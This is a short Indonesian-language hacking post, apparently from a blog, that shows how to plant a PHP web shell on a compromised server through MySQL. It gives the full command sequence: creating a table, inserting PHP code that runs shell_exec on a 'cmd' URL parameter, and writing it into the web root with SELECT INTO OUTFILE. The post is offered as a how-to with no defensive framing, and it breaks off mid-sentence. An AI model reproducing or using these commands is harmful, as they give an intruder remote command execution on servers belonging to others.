Cerita jadul : Membuat file dengan Mysql [injection]

kalo udah bisa masuk, masukkan kode untuk membuat file

mysql> CREATE TABLE crap (codetab text);
Query OK, 0 rows affected (0.01 sec)

mysql> INSERT INTO crap (codetab) values (‘<? $out =
shell_exec($_GET["cmd"].” 2>&1″); echo “<pre>$out</pre>”; ?>’);
Query OK, 1 row affected (0.00 sec)

mysql> SELECT * INTO OUTFILE ‘/var/www/situsnya/cmd.php’ from crap;
Query OK, 1 row affected (0.00 sec)

nah sekarang bisa mengakses [...]